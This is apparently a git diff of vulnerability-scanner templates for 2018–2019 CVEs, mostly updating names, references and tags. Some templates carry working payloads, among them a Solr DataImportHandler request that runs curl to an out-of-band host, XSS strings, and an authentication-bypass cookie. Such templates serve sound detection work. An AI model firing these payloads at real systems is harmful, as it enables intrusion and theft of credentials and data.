diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml
index c25171c9c6..21660dca02 100644
--- a/cves/2018/CVE-2018-8006.yaml
+++ b/cves/2018/CVE-2018-8006.yaml
@@ -1,13 +1,13 @@
 id: CVE-2018-8006
 
 info:
-  name: Apache ActiveMQ XSS
+  name: Apache ActiveMQ <=5.15.5 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter.
+  description: Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter.
   reference:
     - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt
-    - http://www.securityfocus.com/bid/105156
+    - http://web.archive.org/web/20210518135045/https://www.securityfocus.com/bid/105156
     - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E
     - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E
     - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E
@@ -16,6 +16,7 @@ info:
     - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E
     - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E
     - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8006
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -32,7 +33,14 @@ requests:
       - type: word
         words:
           - '"><script>alert("1")</script>'
+
       - type: word
         words:
           - "/html"
         part: header
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml
index 8b3bf3cb60..b9547e3ef0 100644
--- a/cves/2018/CVE-2018-8033.yaml
+++ b/cves/2018/CVE-2018-8033.yaml
@@ -1,12 +1,14 @@
 id: CVE-2018-8033
 
 info:
-  name: Apache OFBiz XXE
+  name: Apache OFBiz 16.11.04 - XML Entity Injection
   author: pikpikcu
   severity: high
-  description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
+  description: |
+    Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection).
   reference:
     - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8033
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -28,9 +30,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/16
diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml
index 03fc2ce90b..c395c9e28c 100644
--- a/cves/2018/CVE-2018-8715.yaml
+++ b/cves/2018/CVE-2018-8715.yaml
@@ -7,6 +7,8 @@ info:
   description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
   reference:
     - https://github.com/embedthis/appweb/issues/610
+    - https://blogs.securiteam.com/index.php/archives/3676
+    - https://security.paloaltonetworks.com/CVE-2018-8715
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml
index 7502e9b545..ac63fc549e 100644
--- a/cves/2018/CVE-2018-8719.yaml
+++ b/cves/2018/CVE-2018-8719.yaml
@@ -9,12 +9,13 @@ info:
     - https://www.exploit-db.com/exploits/44371
     - https://vuldb.com/?id.115817
     - https://www.cvedetails.com/cve/CVE-2018-8719/
+    - https://www.exploit-db.com/exploits/44371/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-8719
     cwe-id: CWE-532
-  tags: wordpress,wp-plugin,cve,cve2018,exposure
+  tags: cve2018,exposure,edb,wordpress,wp-plugin,cve
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-8727.yaml b/cves/2018/CVE-2018-8727.yaml
index b537efb4ad..5a46052885 100644
--- a/cves/2018/CVE-2018-8727.yaml
+++ b/cves/2018/CVE-2018-8727.yaml
@@ -1,19 +1,21 @@
 id: CVE-2018-8727
 
 info:
-  name: Mirasys DVMS Workstation 5.12.6 Path Traversal
+  name: Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
   author: 0x_akoko
   severity: high
-  description: Mirasys DVMS Workstation versions 5.12.6 and below suffer from a path traversal vulnerability.
+  description: |
+    Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
   reference:
     - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html
-    - https://www.cvedetails.com/cve/CVE-2018-8727
+    - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8727
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-8727
     cwe-id: CWE-22
-  tags: cve,cve2018,mirasys,lfi
+  tags: cve,cve2018,mirasys,lfi,packetstorm
 
 requests:
   - method: GET
@@ -28,3 +30,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml
index fcb1442516..aa760a9900 100644
--- a/cves/2018/CVE-2018-8770.yaml
+++ b/cves/2018/CVE-2018-8770.yaml
@@ -4,17 +4,17 @@ info:
   name: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
   author: princechaddha
   severity: medium
-  description: Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php,
-    controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php in tests/.
+  description: Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php in tests/.
   reference:
     - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
     - https://www.exploit-db.com/exploits/44495/
+    - https://github.com/Kyhvedn/CVE_Description/blob/master/Cobub_Razor_0.8.0_more_physical_path_leakage.md
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-8770
     cwe-id: CWE-200
-  tags: cve,cve2018,cobub,razor,exposure
+  tags: cve,cve2018,cobub,razor,exposure,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml
index 7092e10153..3cfa190815 100644
--- a/cves/2018/CVE-2018-9118.yaml
+++ b/cves/2018/CVE-2018-9118.yaml
@@ -1,18 +1,24 @@
 id: CVE-2018-9118
 
 info:
-  name: WP Background Takeover, Directory Traversal <= 4.1.4
+  name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
+  description: |
+    WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
   reference:
     - https://www.exploit-db.com/exploits/44417
+    - https://wpvulndb.com/vulnerabilities/9056
+    - https://99robots.com/docs/wp-background-takeover-advertisements/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-9118
+  remediation: |
+    Upgrade to 4.1.15.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-9118
     cwe-id: CWE-22
-  tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal
+  tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp
 
 requests:
   - method: GET
@@ -22,10 +28,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
           - "DB_HOST"
           - "The base configurations of the WordPress"
-        part: body
         condition: and
+
+# Enhanced by mp on 2022/06/15
diff --git a/cves/2018/CVE-2018-9161.yaml b/cves/2018/CVE-2018-9161.yaml
index d07f2b5e66..4fbaef9dea 100644
--- a/cves/2018/CVE-2018-9161.yaml
+++ b/cves/2018/CVE-2018-9161.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
     - https://nvd.nist.gov/vuln/detail/CVE-2018-9161
+    - https://www.exploit-db.com/exploits/44276/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-9161
     cwe-id: CWE-798
-  tags: cve,cve2018,prismaweb,exposure
+  tags: cve,cve2018,prismaweb,exposure,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml
index 4c8ae5e70c..8cd4869244 100644
--- a/cves/2018/CVE-2018-9205.yaml
+++ b/cves/2018/CVE-2018-9205.yaml
@@ -8,13 +8,17 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/44501
     - https://nvd.nist.gov/vuln/detail/CVE-2018-9205
+    - https://www.drupal.org/project/avatar_uploader/issues/2957966
+    - https://www.drupal.org/project/avatar_uploader
+  remediation: Upgrade to the latest version of avatar_uploader.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-9205
     cwe-id: CWE-22
-  remediation: Upgrade to the latest version of avatar_uploader.
-  tags: cve,cve2018,lfi,drupal
+  metadata:
+    shodan-query: http.component:"drupal"
+  tags: cve,cve2018,lfi,drupal,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-9845.yaml b/cves/2018/CVE-2018-9845.yaml
index 3aff165b1f..4b0e69b0a6 100644
--- a/cves/2018/CVE-2018-9845.yaml
+++ b/cves/2018/CVE-2018-9845.yaml
@@ -1,7 +1,7 @@
 id: CVE-2018-9845
 
 info:
-  name: Etherpad Lite before 1.6.4 is exploitable for admin access.
+  name: Etherpad Lite <1.6.4 - Admin Authentication Bypass
   author: philippedelteil
   severity: critical
   description: Etherpad Lite before 1.6.4 is exploitable for admin access.
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml
index 41f24615a3..9f556785ee 100644
--- a/cves/2018/CVE-2018-9995.yaml
+++ b/cves/2018/CVE-2018-9995.yaml
@@ -1,24 +1,24 @@
 id: CVE-2018-9995
 
 info:
-  name: DVR Authentication Bypass
+  name: TBK DVR4104/DVR4216 Devices - Authentication Bypass
   author: princechaddha
   severity: critical
   description: |
     TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
     MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
-    authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides
-    credentials within JSON data in a response.
+    authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
   reference:
+    - https://www.exploit-db.com/exploits/44577/
     - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html
     - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
     - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/
-    - https://www.exploit-db.com/exploits/44577/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-9995
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-9995
-  tags: cve,cve2018,auth-bypass
+  tags: cve,cve2018,auth-bypass,tbk,edb
 
 requests:
   - method: GET
@@ -27,15 +27,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: body
         words:
           - "\"uid\":"
           - "\"pwd\":"
           - "\"view\":"
           - "playback"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml
index 8e6d0435b4..ef35354554 100644
--- a/cves/2019/CVE-2019-0193.yaml
+++ b/cves/2019/CVE-2019-0193.yaml
@@ -1,22 +1,24 @@
 id: CVE-2019-0193
 
 info:
-  name: Apache Solr - DataImportHandler RCE
+  name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
   author: pdteam
   severity: high
-  description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's
-    "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
-    Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
+  description: |
+    Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
     - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
     - https://paper.seebug.org/1009/
+    - https://issues.apache.org/jira/browse/SOLR-13669
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
+  remediation: |
+    Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2019-0193
     cwe-id: CWE-94
-  tags: cve,cve2019,apache,rce,solr,oast
+  tags: cve2019,apache,rce,solr,oast,kev,vulhub,cve
 
 requests:
   - raw:
@@ -32,7 +34,7 @@ requests:
         Content-type: application/x-www-form-urlencoded
         X-Requested-With: XMLHttpRequest
 
-        command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+        command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
 
     extractors:
       - type: regex
@@ -52,3 +54,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/15
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml
index a0adc60d2f..f52d299811 100644
--- a/cves/2019/CVE-2019-0221.yaml
+++ b/cves/2019/CVE-2019-0221.yaml
@@ -1,24 +1,25 @@
 id: CVE-2019-0221
 
 info:
-  name: Apache Tomcat XSS
+  name: Apache Tomcat - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
-    7.0.0 to 7.0.93 echoes user provided data without escaping and is,
-    therefore, vulnerable to XSS. SSI is disabled by default.
-    The printenv command is intended for debugging and is unlikely to be present in a production website.
+    Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
   reference:
     - https://seclists.org/fulldisclosure/2019/May/50
     - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
     - https://www.exploit-db.com/exploits/50119
+    - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-0221
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-0221
     cwe-id: CWE-79
-  tags: cve,cve2019,apache,xss,tomcat
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: apache,xss,tomcat,seclists,edb,cve,cve2019
 
 requests:
   - method: GET
@@ -41,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2019/CVE-2019-0230.yaml b/cves/2019/CVE-2019-0230.yaml
index bc0b8d313b..417a3be69b 100644
--- a/cves/2019/CVE-2019-0230.yaml
+++ b/cves/2019/CVE-2019-0230.yaml
@@ -1,19 +1,21 @@
 id: CVE-2019-0230
 
 info:
-  name: Apache Struts RCE
+  name: Apache Struts <=2.5.20 - Remote Code Execution
   author: geeknik
   severity: critical
-  description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
+  description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.
   reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-0230
     - https://cwiki.apache.org/confluence/display/WW/S2-059
     - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability
+    - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-0230
     cwe-id: CWE-915
-  tags: struts,rce,cve,cve2019,apache
+  tags: tenable,packetstorm,struts,rce,cve,cve2019,apache
 
 requests:
   - method: GET
@@ -22,5 +24,8 @@ requests:
 
     matchers:
       - type: word
+        part: body
         words:
           - "nuclei16384"
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-10068.yaml b/cves/2019/CVE-2019-10068.yaml
index 595f8fc5cc..bf09cb3e99 100644
--- a/cves/2019/CVE-2019-10068.yaml
+++ b/cves/2019/CVE-2019-10068.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2019-10068
     cwe-id: CWE-502
-  tags: cve,cve2019,rce,deserialization,kentico,iis
+  tags: cve2019,kentico,iis,packetstorm,cve,rce,deserialization,kev,msf
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml
index 0ea730f88a..6b0d55e990 100644
--- a/cves/2019/CVE-2019-10092.yaml
+++ b/cves/2019/CVE-2019-10092.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-10092
 
 info:
-  name: Apache mod_proxy HTML Injection / Partial XSS
+  name: Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead
-    point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
+  description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
   reference:
     - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd
     - https://httpd.apache.org/security/vulnerabilities_24.html
+    - https://lists.debian.org/debian-lts-announce/2019/09/msg00034.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10092
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -24,3 +25,5 @@ requests:
       - type: word
         words:
           - "<a href=\"/\\google.com/evil.html\">"
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml
index 02e1d0b285..7dbe4cde40 100644
--- a/cves/2019/CVE-2019-1010287.yaml
+++ b/cves/2019/CVE-2019-1010287.yaml
@@ -1,21 +1,22 @@
 id: CVE-2019-1010287
 
 info:
-  name: Timesheet 1.5.3 - Cross Site Scripting
+  name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component
-    is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.'
+  description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.'
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
     - http://www.mdh-tz.info/
+    - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/
+    - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-1010287
     cwe-id: CWE-79
   metadata:
-    google-dork: inurl:"/timesheet/login.php"
+    google-query: inurl:"/timesheet/login.php"
   tags: cve,cve2019,timesheet,xss
 
 requests:
@@ -37,3 +38,5 @@ requests:
         words:
           - '><script>javascript:alert(document.domain)</script>'
         part: body
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml
index 9ed4d4f9c4..4c2ef5bfde 100644
--- a/cves/2019/CVE-2019-1010290.yaml
+++ b/cves/2019/CVE-2019-1010290.yaml
@@ -4,13 +4,13 @@ info:
   name: Babel - Open Redirection
   author: 0x_Akoko
   severity: medium
-  description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect  in a newurl parameter. The component is redirect The attack vector
-    is The victim must open a link created by an attacker
+  description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect  in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
   reference:
     - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
-    - https://www.cvedetails.com/cve/CVE-2019-1010290
+    - http://dev.cmsmadesimple.org/project/files/729
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-1010290
     cwe-id: CWE-601
@@ -19,10 +19,10 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
+      - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2019/CVE-2019-10405.yaml b/cves/2019/CVE-2019-10405.yaml
index be0a9cf28f..2084908c29 100644
--- a/cves/2019/CVE-2019-10405.yaml
+++ b/cves/2019/CVE-2019-10405.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2019-10405
     - https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
+    - http://www.openwall.com/lists/oss-security/2019/09/25/3
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
diff --git a/cves/2019/CVE-2019-10475.yaml b/cves/2019/CVE-2019-10475.yaml
index dbab6160a1..d3a3b6f673 100644
--- a/cves/2019/CVE-2019-10475.yaml
+++ b/cves/2019/CVE-2019-10475.yaml
@@ -1,20 +1,21 @@
 id: CVE-2019-10475
 
 info:
-  name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
+  name: Jenkins build-metrics 1.3 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.
+  description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides.
   reference:
     - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490
     - http://www.openwall.com/lists/oss-security/2019/10/23/2
     - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10475
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-10475
     cwe-id: CWE-79
-  tags: cve,cve2019,jenkins,xss,plugin
+  tags: cve,cve2019,jenkins,xss,plugin,packetstorm
 
 requests:
   - method: GET
@@ -34,3 +35,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/11
